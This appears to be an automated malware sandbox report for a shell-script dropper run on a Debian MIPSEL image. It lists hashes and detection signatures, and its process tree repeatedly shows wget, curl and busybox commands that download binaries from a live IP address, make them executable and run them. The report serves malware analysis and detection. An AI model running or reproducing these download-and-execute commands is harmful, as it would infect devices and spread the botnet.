Analysis
-
max time kernel
91s -
max time network
94s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
-
Size
10KB
-
MD5
8eccec101f87a3ed0841253c005aa97f
-
SHA1
1619e034a10047b30bb121c4da04a6876dd1f076
-
SHA256
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
-
SHA512
af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
-
SSDEEP
96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:706
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:729
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:733
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:734
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:736
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:739
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:740
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:757
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:770
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:791
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:826
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:827
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:832
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:835
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:836
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:838
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:841
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:842
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:844
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:847
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:848
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:850
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:854
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:856
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:862
-
-
/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:868
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:874
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:880
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:886
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:892
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:898
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:904
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:910
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:916
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:922
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:928
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:934
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:940
-
-
/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:946
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:952
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:958
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:964
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:970
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97